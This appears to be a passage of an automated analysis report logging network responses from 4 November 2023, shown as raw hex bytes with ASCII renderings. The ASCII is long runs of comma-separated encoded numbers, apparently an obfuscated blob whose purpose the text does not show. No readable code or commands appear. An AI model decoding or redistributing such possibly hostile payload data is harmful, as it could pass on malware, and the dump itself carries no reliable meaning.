                                                    2023-11-04 00:30:16 UTC168INData Raw: 2c 37 34 2c 64 63 2c 35 65 2c 37 64 2c 34 62 2c 37 37 2c 39 33 2c 63 31 2c 37 37 2c 66 35 2c 61 34 2c 62 33 2c 31 33 64 2c 31 36 34 2c 64 35 2c 34 36 2c 33 38 2c 62 63 2c 31 33 34 2c 35 37 2c 64 34 2c 66 31 2c 35 64 2c 66 31 2c 31 31 33 2c 35 34 2c 36 62 2c 35 34 2c 63 34 2c 36 62 2c 31 34 61 2c 36 61 2c 35 31 2c 37 34 2c 35 61 2c 64 37 2c 34 64 2c 31 33 36 2c 63 33 2c 33 35 2c 33 32 2c 34 31 2c 61 38 2c 65 63 2c 39 61 2c 31 33 39 2c 31 34 30 2c 61 64 2c 34 35 2c 33 39 2c 37 30 2c 61 64 2c 35 30 2c 38 38 2c 64 37 2c 62 31 2c 31 33 30 2c 31 33 61 2c 63 37 2c 36 31 2c 35 61 2c 36 37 2c 63 63 2c 33 39 2c 39 62 2c 66 64 2c 39 66 2c 31 34 64 2c 31 33 33 2c 63 38 2c 35 30 2c 33 34 2c 33 32 2c 61 62 2c 35 32 2c 63 62 2c 35 36 2c 36 36 2c 35 38 2c 34 36 2c 63 31
                                                    Data Ascii: ,74,dc,5e,7d,4b,77,93,c1,77,f5,a4,b3,13d,164,d5,46,38,bc,134,57,d4,f1,5d,f1,113,54,6b,54,c4,6b,14a,6a,51,74,5a,d7,4d,136,c3,35,32,41,a8,ec,9a,139,140,ad,45,39,70,ad,50,88,d7,b1,130,13a,c7,61,5a,67,cc,39,9b,fd,9f,14d,133,c8,50,34,32,ab,52,cb,56,66,58,46,c1
                                                    2023-11-04 00:30:16 UTC172INData Raw: 35 61 2c 36 37 2c 62 32 2c 31 33 37 2c 62 39 2c 39 34 2c 31 35 39 2c 31 34 33 2c 64 36 2c 31 36 66 2c 37 65 2c 31 32 66 2c 34 31 2c 63 35 2c 65 30 2c 36 34 2c 35 35 2c 36 35 2c 64 36 2c 38 39 2c 61 32 2c 31 31 39 2c 61 33 2c 31 31 35 2c 61 37 2c 31 32 38 2c 31 34 35 2c 65 66 2c 31 34 34 2c 35 34 2c 64 64 2c 38 62 2c 65 37 2c 61 62 2c 61 31 2c 34 30 2c 38 31 2c 37 34 2c 35 65 2c 36 64 2c 34 62 2c 65 65 2c 35 36 2c 31 31 63 2c 38 36 2c 62 64 2c 35 31 2c 36 33 2c 65 30 2c 31 32 39 2c 39 33 2c 31 30 39 2c 61 63 2c 35 35 2c 31 33 37 2c 34 33 2c 31 31 62 2c 66 64 2c 34 65 2c 36 63 2c 31 33 37 2c 36 33 2c 62 62 2c 31 33 63 2c 64 33 2c 31 30 66 2c 31 36 31 2c 31 33 37 2c 39 64 2c 61 66 2c 31 31 64 2c 65 31 2c 35 34 2c 31 33 65 2c 34 33 2c 31 31 31 2c 31 30 66 2c
                                                    Data Ascii: 5a,67,b2,137,b9,94,159,143,d6,16f,7e,12f,41,c5,e0,64,55,65,d6,89,a2,119,a3,115,a7,128,145,ef,144,54,dd,8b,e7,ab,a1,40,81,74,5e,6d,4b,ee,56,11c,86,bd,51,63,e0,129,93,109,ac,55,137,43,11b,fd,4e,6c,137,63,bb,13c,d3,10f,161,137,9d,af,11d,e1,54,13e,43,111,10f,
                                                    2023-11-04 00:30:16 UTC176INData Raw: 38 62 2c 63 66 2c 38 66 2c 38 33 2c 31 32 36 2c 61 31 2c 36 37 2c 36 32 2c 61 63 2c 35 61 2c 63 62 2c 62 30 2c 66 30 2c 31 33 32 2c 38 36 2c 63 36 2c 31 31 61 2c 34 31 2c 37 63 2c 31 34 66 2c 63 31 2c 62 34 2c 64 61 2c 36 30 2c 61 34 2c 39 37 2c 39 36 2c 31 35 39 2c 31 31 37 2c 63 37 2c 33 31 2c 34 65 2c 31 36 33 2c 31 31 33 2c 35 35 2c 36 62 2c 35 34 2c 35 61 2c 64 63 2c 37 37 2c 66 39 2c 31 32 64 2c 37 36 2c 64 64 2c 31 34 66 2c 34 65 2c 66 61 2c 31 33 63 2c 33 63 2c 61 34 2c 36 62 2c 31 34 34 2c 31 30 38 2c 31 35 34 2c 38 39 2c 65 64 2c 35 61 2c 31 31 39 2c 37 39 2c 37 30 2c 64 33 2c 64 61 2c 66 38 2c 31 30 38 2c 36 66 2c 34 63 2c 35 32 2c 36 62 2c 64 37 2c 31 34 33 2c 36 62 2c 64 34 2c 34 34 2c 63 37 2c 31 35 34 2c 35 64 2c 37 30 2c 31 31 33 2c 31 37
                                                    Data Ascii: 8b,cf,8f,83,126,a1,67,62,ac,5a,cb,b0,f0,132,86,c6,11a,41,7c,14f,c1,b4,da,60,a4,97,96,159,117,c7,31,4e,163,113,55,6b,54,5a,dc,77,f9,12d,76,dd,14f,4e,fa,13c,3c,a4,6b,144,108,154,89,ed,5a,119,79,70,d3,da,f8,108,6f,4c,52,6b,d7,143,6b,d4,44,c7,154,5d,70,113,17
                                                    2023-11-04 00:30:16 UTC181INData Raw: 2c 35 31 2c 31 36 32 2c 63 61 2c 37 39 2c 31 35 37 2c 62 62 2c 34 38 2c 63 34 2c 62 64 2c 34 66 2c 31 33 37 2c 31 32 63 2c 31 34 63 2c 31 36 62 2c 31 34 62 2c 61 66 2c 31 32 65 2c 64 66 2c 31 35 39 2c 62 63 2c 65 64 2c 31 32 34 2c 63 37 2c 31 36 30 2c 36 61 2c 63 33 2c 31 34 61 2c 65 63 2c 34 66 2c 63 31 2c 37 66 2c 31 33 31 2c 31 33 39 2c 64 66 2c 31 34 39 2c 31 36 34 2c 31 35 37 2c 64 31 2c 61 64 2c 34 31 2c 37 66 2c 31 30 31 2c 35 35 2c 38 31 2c 31 33 36 2c 31 32 33 2c 63 35 2c 35 32 2c 36 62 2c 64 37 2c 31 35 32 2c 63 63 2c 31 34 64 2c 34 34 2c 38 61 2c 38 33 2c 31 31 30 2c 37 33 2c 39 62 2c 31 35 66 2c 38 64 2c 31 32 65 2c 31 33 31 2c 31 34 30 2c 64 36 2c 31 32 33 2c 61 65 2c 64 61 2c 31 34 39 2c 35 35 2c 66 36 2c 33 66 2c 63 30 2c 31 32 62 2c 65 39
                                                    Data Ascii: ,51,162,ca,79,157,bb,48,c4,bd,4f,137,12c,14c,16b,14b,af,12e,df,159,bc,ed,124,c7,160,6a,c3,14a,ec,4f,c1,7f,131,139,df,149,164,157,d1,ad,41,7f,101,55,81,136,123,c5,52,6b,d7,152,cc,14d,44,8a,83,110,73,9b,15f,8d,12e,131,140,d6,123,ae,da,149,55,f6,3f,c0,12b,e9
                                                    2023-11-04 00:30:16 UTC185INData Raw: 38 2c 37 34 2c 39 64 2c 62 38 2c 35 33 2c 66 37 2c 35 34 2c 39 39 2c 39 32 2c 31 31 38 2c 37 31 2c 38 34 2c 61 30 2c 65 61 2c 64 66 2c 35 30 2c 34 34 2c 64 65 2c 62 66 2c 37 63 2c 64 66 2c 31 33 37 2c 31 34 31 2c 66 63 2c 35 36 2c 31 32 31 2c 35 35 2c 64 62 2c 64 64 2c 36 62 2c 39 65 2c 39 63 2c 31 32 30 2c 62 34 2c 65 33 2c 34 33 2c 34 66 2c 38 61 2c 61 37 2c 66 31 2c 31 30 63 2c 36 31 2c 65 66 2c 61 30 2c 35 63 2c 36 37 2c 36 32 2c 62 62 2c 63 31 2c 38 63 2c 35 61 2c 37 63 2c 64 66 2c 31 33 38 2c 31 34 31 2c 66 64 2c 62 32 2c 31 32 32 2c 31 33 31 2c 65 33 2c 31 31 36 2c 64 35 2c 65 30 2c 34 65 2c 66 65 2c 37 39 2c 37 33 2c 34 33 2c 31 33 38 2c 36 33 2c 35 30 2c 36 63 2c 34 63 2c 37 37 2c 36 62 2c 35 34 2c 35 61 2c 65 37 2c 39 35 2c 31 30 31 2c 34 66 2c
                                                    Data Ascii: 8,74,9d,b8,53,f7,54,99,92,118,71,84,a0,ea,df,50,44,de,bf,7c,df,137,141,fc,56,121,55,db,dd,6b,9e,9c,120,b4,e3,43,4f,8a,a7,f1,10c,61,ef,a0,5c,67,62,bb,c1,8c,5a,7c,df,138,141,fd,b2,122,131,e3,116,d5,e0,4e,fe,79,73,43,138,63,50,6c,4c,77,6b,54,5a,e7,95,101,4f,
                                                    2023-11-04 00:30:16 UTC189INData Raw: 34 2c 31 34 33 2c 65 39 2c 37 36 2c 66 61 2c 39 30 2c 31 34 37 2c 61 64 2c 33 35 2c 38 32 2c 31 34 30 2c 63 36 2c 37 62 2c 65 30 2c 31 32 62 2c 31 35 37 2c 62 62 2c 34 63 2c 31 33 38 2c 65 35 2c 35 33 2c 31 33 37 2c 63 35 2c 31 34 35 2c 31 36 62 2c 31 34 62 2c 64 35 2c 31 32 66 2c 36 63 2c 65 35 2c 62 34 2c 31 35 65 2c 39 37 2c 61 32 2c 61 37 2c 31 32 37 2c 63 38 2c 31 33 33 2c 31 33 38 2c 66 62 2c 31 33 33 2c 31 33 31 2c 31 30 61 2c 31 31 34 2c 65 65 2c 31 35 34 2c 62 61 2c 65 33 2c 31 33 32 2c 63 33 2c 37 65 2c 38 34 2c 63 36 2c 31 34 37 2c 39 36 2c 63 32 2c 63 62 2c 63 66 2c 31 34 61 2c 62 30 2c 63 38 2c 62 34 2c 65 61 2c 31 35 61 2c 39 65 2c 62 39 2c 38 64 2c 31 35 39 2c 65 32 2c 36 62 2c 31 37 36 2c 62 38 2c 34 63 2c 31 33 31 2c 62 36 2c 36 31 2c 31
                                                    Data Ascii: 4,143,e9,76,fa,90,147,ad,35,82,140,c6,7b,e0,12b,157,bb,4c,138,e5,53,137,c5,145,16b,14b,d5,12f,6c,e5,b4,15e,97,a2,a7,127,c8,133,138,fb,133,131,10a,114,ee,154,ba,e3,132,c3,7e,84,c6,147,96,c2,cb,cf,14a,b0,c8,b4,ea,15a,9e,b9,8d,159,e2,6b,176,b8,4c,131,b6,61,1
                                                    2023-11-04 00:30:16 UTC193INData Raw: 63 66 2c 63 31 2c 36 36 2c 66 38 2c 62 63 2c 37 62 2c 63 65 2c 37 64 2c 33 61 2c 63 61 2c 39 66 2c 36 62 2c 65 30 2c 64 61 2c 36 34 2c 31 33 31 2c 33 62 2c 63 34 2c 63 64 2c 34 62 2c 64 32 2c 61 65 2c 31 34 32 2c 36 63 2c 63 31 2c 35 61 2c 61 36 2c 31 32 65 2c 36 39 2c 65 62 2c 65 32 2c 33 38 2c 34 34 2c 37 34 2c 65 35 2c 62 61 2c 31 33 62 2c 31 30 34 2c 34 66 2c 31 30 35 2c 62 64 2c 39 61 2c 35 35 2c 65 63 2c 61 33 2c 36 64 2c 65 31 2c 61 34 2c 33 63 2c 63 32 2c 65 31 2c 34 37 2c 64 61 2c 37 66 2c 35 32 2c 66 35 2c 62 64 2c 35 61 2c 66 36 2c 61 32 2c 35 65 2c 61 32 2c 62 30 2c 34 30 2c 62 39 2c 64 34 2c 65 34 2c 62 39 2c 34 64 2c 37 62 2c 63 62 2c 38 31 2c 34 31 2c 31 33 66 2c 31 31 32 2c 65 62 2c 61 31 2c 36 37 2c 35 63 2c 63 39 2c 31 33 32 2c 35 39 2c
                                                    Data Ascii: cf,c1,66,f8,bc,7b,ce,7d,3a,ca,9f,6b,e0,da,64,131,3b,c4,cd,4b,d2,ae,142,6c,c1,5a,a6,12e,69,eb,e2,38,44,74,e5,ba,13b,104,4f,105,bd,9a,55,ec,a3,6d,e1,a4,3c,c2,e1,47,da,7f,52,f5,bd,5a,f6,a2,5e,a2,b0,40,b9,d4,e4,b9,4d,7b,cb,81,41,13f,112,eb,a1,67,5c,c9,132,59,
                                                    2023-11-04 00:30:16 UTC196INData Raw: 2c 64 36 2c 38 62 2c 61 62 2c 66 34 2c 61 31 2c 31 35 32 2c 66 32 2c 63 31 2c 33 63 2c 37 66 2c 64 33 2c 36 32 2c 65 32 2c 38 65 2c 31 33 32 2c 34 33 2c 33 34 2c 33 32 2c 63 31 2c 64 34 2c 31 35 63 2c 37 35 2c 64 38 2c 37 32 2c 31 31 39 2c 31 32 33 2c 63 34 2c 62 64 2c 31 33 62 2c 64 63 2c 37 64 2c 34 66 2c 37 30 2c 31 34 33 2c 31 32 35 2c 38 63 2c 62 30 2c 65 61 2c 61 62 2c 31 36 30 2c 34 31 2c 62 39 2c 39 61 2c 65 35 2c 62 61 2c 35 33 2c 39 38 2c 35 63 2c 31 31 66 2c 35 31 2c 63 34 2c 31 31 32 2c 31 34 33 2c 31 32 38 2c 31 35 30 2c 65 33 2c 39 33 2c 31 33 30 2c 63 36 2c 62 63 2c 34 34 2c 35 33 2c 31 32 38 2c 31 32 31 2c 38 64 2c 65 38 2c 65 32 2c 31 32 66 2c 35 34 2c 35 61 2c 36 37 2c 31 36 30 2c 34 31 2c 62 39 2c 37 61 2c 65 35 2c 62 61 2c 35 33 2c 39
                                                    Data Ascii: ,d6,8b,ab,f4,a1,152,f2,c1,3c,7f,d3,62,e2,8e,132,43,34,32,c1,d4,15c,75,d8,72,119,123,c4,bd,13b,dc,7d,4f,70,143,125,8c,b0,ea,ab,160,41,b9,9a,e5,ba,53,98,5c,11f,51,c4,112,143,128,150,e3,93,130,c6,bc,44,53,128,121,8d,e8,e2,12f,54,5a,67,160,41,b9,7a,e5,ba,53,9
                                                    2023-11-04 00:30:16 UTC200INData Raw: 2c 66 36 2c 36 32 2c 65 37 2c 65 30 2c 36 33 2c 63 31 2c 38 32 2c 66 39 2c 31 32 33 2c 65 32 2c 36 35 2c 62 32 2c 36 30 2c 66 34 2c 66 39 2c 38 38 2c 35 31 2c 64 38 2c 36 37 2c 66 30 2c 61 35 2c 31 34 32 2c 37 33 2c 34 36 2c 61 30 2c 31 31 35 2c 39 36 2c 33 31 2c 63 33 2c 37 33 2c 63 66 2c 37 37 2c 31 32 62 2c 31 31 62 2c 61 31 2c 36 37 2c 36 32 2c 63 33 2c 39 31 2c 31 37 30 2c 65 33 2c 37 35 2c 64 38 2c 62 39 2c 34 37 2c 39 33 2c 39 30 2c 39 63 2c 31 31 61 2c 31 32 36 2c 62 64 2c 65 35 2c 31 35 35 2c 38 36 2c 33 38 2c 39 64 2c 31 36 66 2c 37 38 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 64 37 2c 39 36 2c 38 66 2c 36 34 2c 65 33 2c 64 33 2c 38 36 2c 34 38 2c 64 31 2c 65 30 2c 37 65 2c 37 64 2c 37 36 2c 31 35 37 2c 39 36 2c 38 61 2c 38 39 2c 65 32 2c 65 31 2c
                                                    Data Ascii: ,f6,62,e7,e0,63,c1,82,f9,123,e2,65,b2,60,f4,f9,88,51,d8,67,f0,a5,142,73,46,a0,115,96,31,c3,73,cf,77,12b,11b,a1,67,62,c3,91,170,e3,75,d8,b9,47,93,90,9c,11a,126,bd,e5,155,86,38,9d,16f,78,4f,31,4e,6c,d7,96,8f,64,e3,d3,86,48,d1,e0,7e,7d,76,157,96,8a,89,e2,e1,
                                                    2023-11-04 00:30:16 UTC204INData Raw: 61 33 2c 33 38 2c 31 30 62 2c 37 38 2c 37 65 2c 65 39 2c 31 33 63 2c 62 38 2c 34 33 2c 31 31 63 2c 39 35 2c 31 34 30 2c 31 35 30 2c 31 36 32 2c 64 38 2c 61 32 2c 36 63 2c 31 31 38 2c 37 66 2c 33 39 2c 37 30 2c 39 63 2c 63 33 2c 34 63 2c 62 36 2c 38 30 2c 31 31 65 2c 39 39 2c 36 62 2c 31 33 63 2c 36 61 2c 63 62 2c 36 32 2c 33 38 2c 39 64 2c 66 39 2c 31 31 61 2c 65 31 2c 35 37 2c 65 31 2c 34 33 2c 39 65 2c 33 34 2c 61 62 2c 35 31 2c 31 36 32 2c 36 61 2c 37 39 2c 31 32 61 2c 38 64 2c 33 38 2c 36 63 2c 31 33 30 2c 61 30 2c 31 31 32 2c 39 62 2c 36 36 2c 64 34 2c 66 63 2c 38 37 2c 61 64 2c 35 34 2c 31 34 32 2c 31 35 32 2c 31 35 63 2c 31 33 37 2c 31 34 33 2c 64 65 2c 36 32 2c 31 35 35 2c 31 33 38 2c 31 36 36 2c 31 34 32 2c 31 33 33 2c 38 62 2c 63 34 2c 62 36 2c
                                                    Data Ascii: a3,38,10b,78,7e,e9,13c,b8,43,11c,95,140,150,162,d8,a2,6c,118,7f,39,70,9c,c3,4c,b6,80,11e,99,6b,13c,6a,cb,62,38,9d,f9,11a,e1,57,e1,43,9e,34,ab,51,162,6a,79,12a,8d,38,6c,130,a0,112,9b,66,d4,fc,87,ad,54,142,152,15c,137,143,de,62,155,138,166,142,133,8b,c4,b6,
                                                    2023-11-04 00:30:16 UTC208INData Raw: 2c 39 66 2c 36 66 2c 63 30 2c 39 35 2c 31 30 37 2c 31 37 33 2c 36 66 2c 31 31 35 2c 31 33 62 2c 62 38 2c 34 33 2c 66 36 2c 33 36 2c 34 31 2c 64 63 2c 31 36 32 2c 61 62 2c 31 36 34 2c 38 64 2c 66 32 2c 65 65 2c 38 30 2c 37 30 2c 31 34 32 2c 36 34 2c 64 35 2c 31 33 65 2c 61 64 2c 34 63 2c 64 64 2c 31 35 62 2c 64 39 2c 31 35 30 2c 64 63 2c 37 64 2c 31 33 37 2c 37 39 2c 38 63 2c 31 32 35 2c 62 34 2c 34 62 2c 31 35 66 2c 61 38 2c 31 33 33 2c 31 33 31 2c 31 34 30 2c 61 61 2c 65 65 2c 31 34 35 2c 62 62 2c 31 35 37 2c 37 62 2c 65 34 2c 65 66 2c 62 37 2c 34 33 2c 31 34 65 2c 34 36 2c 66 61 2c 31 35 63 2c 38 64 2c 35 32 2c 66 36 2c 31 31 61 2c 62 38 2c 31 32 61 2c 31 30 33 2c 65 30 2c 66 61 2c 62 62 2c 35 61 2c 66 30 2c 31 34 33 2c 31 37 36 2c 62 37 2c 34 61 2c 38
                                                    Data Ascii: ,9f,6f,c0,95,107,173,6f,115,13b,b8,43,f6,36,41,dc,162,ab,164,8d,f2,ee,80,70,142,64,d5,13e,ad,4c,dd,15b,d9,150,dc,7d,137,79,8c,125,b4,4b,15f,a8,133,131,140,aa,ee,145,bb,157,7b,e4,ef,b7,43,14e,46,fa,15c,8d,52,f6,11a,b8,12a,103,e0,fa,bb,5a,f0,143,176,b7,4a,8
                                                    2023-11-04 00:30:16 UTC213INData Raw: 31 35 39 2c 31 36 63 2c 31 33 33 2c 66 66 2c 31 33 34 2c 31 33 33 2c 31 33 31 2c 31 30 34 2c 31 33 39 2c 31 34 66 2c 31 35 31 2c 31 36 34 2c 31 35 37 2c 64 31 2c 37 38 2c 62 35 2c 66 35 2c 31 30 33 2c 63 33 2c 33 33 2c 31 34 64 2c 31 33 63 2c 31 33 35 2c 31 30 36 2c 31 36 61 2c 31 35 33 2c 31 35 39 2c 64 31 2c 36 61 2c 61 30 2c 38 34 2c 61 61 2c 39 63 2c 36 64 2c 31 33 33 2c 39 61 2c 31 33 34 2c 31 33 33 2c 31 33 31 2c 31 34 30 2c 38 36 2c 38 37 2c 31 32 30 2c 61 63 2c 35 38 2c 31 32 65 2c 62 33 2c 31 33 33 2c 31 36 66 2c 31 34 32 2c 61 38 2c 62 36 2c 31 30 65 2c 65 30 2c 36 32 2c 64 35 2c 64 30 2c 31 35 30 2c 35 61 2c 31 36 36 2c 31 33 32 2c 31 32 33 2c 34 62 2c 61 37 2c 31 31 61 2c 61 64 2c 31 30 65 2c 31 30 32 2c 61 38 2c 31 31 63 2c 66 39 2c 38 36 2c
                                                    Data Ascii: 159,16c,133,ff,134,133,131,104,139,14f,151,164,157,d1,78,b5,f5,103,c3,33,14d,13c,135,106,16a,153,159,d1,6a,a0,84,aa,9c,6d,133,9a,134,133,131,140,86,87,120,ac,58,12e,b3,133,16f,142,a8,b6,10e,e0,62,d5,d0,150,5a,166,132,123,4b,a7,11a,ad,10e,102,a8,11c,f9,86,
                                                    2023-11-04 00:30:16 UTC228INData Raw: 61 2c 36 31 2c 64 61 2c 61 39 2c 36 31 2c 31 34 65 2c 31 32 64 2c 34 36 2c 33 38 2c 33 39 2c 66 33 2c 31 30 62 2c 35 30 2c 62 61 2c 39 34 2c 37 38 2c 66 35 2c 35 65 2c 36 63 2c 35 34 2c 35 61 2c 64 63 2c 36 62 2c 38 65 2c 31 32 63 2c 31 36 66 2c 35 61 2c 36 64 2c 34 62 2c 64 30 2c 31 32 65 2c 33 39 2c 62 64 2c 38 37 2c 35 39 2c 65 63 2c 35 62 2c 31 36 34 2c 63 65 2c 35 65 2c 31 33 37 2c 61 66 2c 37 38 2c 39 39 2c 31 33 37 2c 65 36 2c 34 65 2c 36 63 2c 34 63 2c 61 62 2c 62 62 2c 31 33 63 2c 64 30 2c 63 38 2c 36 32 2c 33 38 2c 63 37 2c 31 33 38 2c 36 36 2c 66 36 2c 39 31 2c 37 62 2c 37 65 2c 66 62 2c 34 31 2c 63 35 2c 64 61 2c 36 33 2c 35 35 2c 36 35 2c 64 62 2c 31 33 65 2c 31 33 37 2c 34 38 2c 66 34 2c 63 33 2c 34 66 2c 33 31 2c 34 65 2c 31 36 32 2c 39 32
                                                    Data Ascii: a,61,da,a9,61,14e,12d,46,38,39,f3,10b,50,ba,94,78,f5,5e,6c,54,5a,dc,6b,8e,12c,16f,5a,6d,4b,d0,12e,39,bd,87,59,ec,5b,164,ce,5e,137,af,78,99,137,e6,4e,6c,4c,ab,bb,13c,d0,c8,62,38,c7,138,66,f6,91,7b,7e,fb,41,c5,da,63,55,65,db,13e,137,48,f4,c3,4f,31,4e,162,92
                                                    2023-11-04 00:30:16 UTC240INData Raw: 2c 37 31 2c 61 38 2c 31 34 35 2c 34 64 2c 31 33 31 2c 31 36 30 2c 38 34 2c 34 66 2c 62 63 2c 31 34 36 2c 65 66 2c 31 34 62 2c 31 35 31 2c 65 30 2c 35 63 2c 31 35 39 2c 37 63 2c 61 65 2c 31 32 38 2c 38 35 2c 37 34 2c 31 34 35 2c 36 66 2c 37 65 2c 31 33 37 2c 63 38 2c 66 34 2c 61 36 2c 34 64 2c 61 31 2c 31 34 62 2c 37 66 2c 31 30 64 2c 31 35 37 2c 31 34 35 2c 39 31 2c 62 63 2c 31 33 38 2c 31 34 32 2c 31 33 61 2c 34 63 2c 64 39 2c 31 33 32 2c 31 30 64 2c 31 34 61 2c 37 30 2c 64 66 2c 35 65 2c 65 63 2c 36 32 2c 31 30 39 2c 38 62 2c 37 34 2c 64 64 2c 31 35 33 2c 36 61 2c 31 33 38 2c 31 32 39 2c 33 61 2c 62 66 2c 38 35 2c 38 31 2c 36 37 2c 64 35 2c 38 35 2c 31 35 35 2c 64 31 2c 66 66 2c 39 38 2c 63 65 2c 61 30 2c 31 31 32 2c 39 62 2c 35 65 2c 64 34 2c 34 63 2c
                                                    Data Ascii: ,71,a8,145,4d,131,160,84,4f,bc,146,ef,14b,151,e0,5c,159,7c,ae,128,85,74,145,6f,7e,137,c8,f4,a6,4d,a1,14b,7f,10d,157,145,91,bc,138,142,13a,4c,d9,132,10d,14a,70,df,5e,ec,62,109,8b,74,dd,153,6a,138,129,3a,bf,85,81,67,d5,85,155,d1,ff,98,ce,a0,112,9b,5e,d4,4c,
                                                    2023-11-04 00:30:16 UTC256INData Raw: 31 36 37 2c 64 30 2c 62 32 2c 33 33 2c 63 62 2c 36 30 2c 65 62 2c 36 33 2c 66 30 2c 31 34 66 2c 63 36 2c 37 36 2c 33 39 2c 65 35 2c 31 33 35 2c 31 33 61 2c 31 31 33 2c 62 38 2c 37 38 2c 61 35 2c 31 31 30 2c 38 66 2c 31 30 34 2c 61 31 2c 36 37 2c 65 64 2c 31 33 33 2c 31 33 37 2c 31 31 39 2c 65 35 2c 62 32 2c 35 33 2c 31 30 32 2c 62 38 2c 33 63 2c 33 37 2c 66 64 2c 35 31 2c 36 33 2c 35 35 2c 66 30 2c 36 30 2c 64 31 2c 34 31 2c 63 32 2c 37 62 2c 63 65 2c 35 37 2c 62 63 2c 39 37 2c 37 30 2c 64 35 2c 39 64 2c 36 66 2c 64 66 2c 35 61 2c 66 32 2c 61 32 2c 34 30 2c 63 66 2c 63 31 2c 31 35 32 2c 66 36 2c 38 65 2c 37 66 2c 37 36 2c 66 34 2c 37 32 2c 37 34 2c 31 35 30 2c 65 63 2c 35 36 2c 39 65 2c 64 35 2c 31 34 32 2c 61 63 2c 33 65 2c 66 62 2c 39 30 2c 31 34 62 2c
                                                    Data Ascii: 167,d0,b2,33,cb,60,eb,63,f0,14f,c6,76,39,e5,135,13a,113,b8,78,a5,110,8f,104,a1,67,ed,133,137,119,e5,b2,53,102,b8,3c,37,fd,51,63,55,f0,60,d1,41,c2,7b,ce,57,bc,97,70,d5,9d,6f,df,5a,f2,a2,40,cf,c1,152,f6,8e,7f,76,f4,72,74,150,ec,56,9e,d5,142,ac,3e,fb,90,14b,
                                                    2023-11-04 00:30:16 UTC272INData Raw: 33 38 2c 37 37 2c 31 33 39 2c 65 33 2c 62 32 2c 31 34 37 2c 31 30 32 2c 38 38 2c 33 63 2c 38 35 2c 39 37 2c 64 63 2c 64 38 2c 36 64 2c 39 38 2c 31 33 33 2c 63 39 2c 62 35 2c 34 35 2c 37 31 2c 39 61 2c 64 38 2c 62 36 2c 63 32 2c 31 36 62 2c 31 34 62 2c 31 35 31 2c 66 34 2c 31 30 39 2c 63 36 2c 31 36 36 2c 31 36 31 2c 31 33 37 2c 35 33 2c 66 39 2c 31 35 38 2c 36 64 2c 34 62 2c 37 37 2c 39 36 2c 39 63 2c 62 32 2c 34 31 2c 35 31 2c 36 33 2c 65 32 2c 31 32 32 2c 64 34 2c 31 34 35 2c 31 33 37 2c 31 33 38 2c 66 62 2c 31 31 32 2c 61 30 2c 31 33 30 2c 63 33 2c 38 30 2c 64 35 2c 65 66 2c 65 33 2c 31 35 33 2c 31 35 39 2c 31 36 36 2c 31 36 31 2c 61 64 2c 35 34 2c 63 34 2c 31 34 32 2c 64 65 2c 38 30 2c 37 37 2c 34 33 2c 62 66 2c 31 32 32 2c 63 34 2c 31 31 35 2c 37 62
                                                    Data Ascii: 38,77,139,e3,b2,147,102,88,3c,85,97,dc,d8,6d,98,133,c9,b5,45,71,9a,d8,b6,c2,16b,14b,151,f4,109,c6,166,161,137,53,f9,158,6d,4b,77,96,9c,b2,41,51,63,e2,122,d4,145,137,138,fb,112,a0,130,c3,80,d5,ef,e3,153,159,166,161,ad,54,c4,142,de,80,77,43,bf,122,c4,115,7b
                                                    2023-11-04 00:30:16 UTC288INData Raw: 36 32 2c 31 35 63 2c 38 64 2c 35 32 2c 64 33 2c 38 38 2c 37 36 2c 61 39 2c 36 32 2c 38 66 2c 31 34 33 2c 31 34 61 2c 64 66 2c 31 32 64 2c 35 61 2c 66 62 2c 35 37 2c 33 35 2c 33 32 2c 34 31 2c 61 31 2c 31 34 62 2c 31 31 39 2c 31 30 33 2c 31 35 37 2c 31 34 35 2c 66 66 2c 33 64 2c 39 34 2c 36 37 2c 36 62 2c 37 33 2c 34 65 2c 63 33 2c 65 66 2c 31 32 32 2c 31 33 61 2c 39 62 2c 35 61 2c 31 36 36 2c 31 33 38 2c 38 38 2c 31 32 63 2c 31 32 33 2c 66 38 2c 31 36 63 2c 31 34 61 2c 31 33 65 2c 34 37 2c 35 38 2c 34 32 2c 35 64 2c 39 33 2c 36 33 2c 61 63 2c 31 30 38 2c 31 32 63 2c 31 31 35 2c 37 66 2c 33 39 2c 31 36 66 2c 31 31 39 2c 39 66 2c 31 31 39 2c 65 38 2c 31 30 61 2c 31 34 62 2c 31 35 31 2c 31 33 32 2c 35 38 2c 37 65 2c 31 35 62 2c 37 64 2c 37 61 2c 34 34 2c 63
                                                    Data Ascii: 62,15c,8d,52,d3,88,76,a9,62,8f,143,14a,df,12d,5a,fb,57,35,32,41,a1,14b,119,103,157,145,ff,3d,94,67,6b,73,4e,c3,ef,122,13a,9b,5a,166,138,88,12c,123,f8,16c,14a,13e,47,58,42,5d,93,63,ac,108,12c,115,7f,39,16f,119,9f,119,e8,10a,14b,151,132,58,7e,15b,7d,7a,44,c
                                                    2023-11-04 00:30:16 UTC304INData Raw: 35 34 2c 31 36 34 2c 64 62 2c 61 36 2c 61 38 2c 31 33 36 2c 66 62 2c 63 38 2c 31 32 37 2c 31 32 65 2c 31 34 64 2c 31 36 62 2c 64 37 2c 39 66 2c 31 36 37 2c 62 33 2c 62 38 2c 39 61 2c 31 32 66 2c 39 33 2c 31 32 63 2c 31 33 39 2c 38 37 2c 31 36 63 2c 31 34 61 2c 31 34 30 2c 31 30 36 2c 62 66 2c 31 33 31 2c 34 34 2c 63 33 2c 61 34 2c 35 35 2c 36 37 2c 63 38 2c 38 37 2c 33 38 2c 36 64 2c 65 30 2c 38 34 2c 34 66 2c 63 31 2c 62 65 2c 61 64 2c 34 63 2c 31 32 65 2c 64 62 2c 39 35 2c 35 61 2c 31 34 66 2c 64 32 2c 37 39 2c 34 34 2c 61 32 2c 63 62 2c 61 65 2c 34 62 2c 64 35 2c 62 35 2c 37 35 2c 33 32 2c 63 63 2c 31 35 30 2c 62 38 2c 65 30 2c 31 35 31 2c 64 62 2c 31 33 32 2c 34 38 2c 31 33 38 2c 65 35 2c 34 62 2c 64 63 2c 37 65 2c 31 33 65 2c 31 35 34 2c 37 62 2c 62
                                                    Data Ascii: 54,164,db,a6,a8,136,fb,c8,127,12e,14d,16b,d7,9f,167,b3,b8,9a,12f,93,12c,139,87,16c,14a,140,106,bf,131,44,c3,a4,55,67,c8,87,38,6d,e0,84,4f,c1,be,ad,4c,12e,db,95,5a,14f,d2,79,44,a2,cb,ae,4b,d5,b5,75,32,cc,150,b8,e0,151,db,132,48,138,e5,4b,dc,7e,13e,154,7b,b
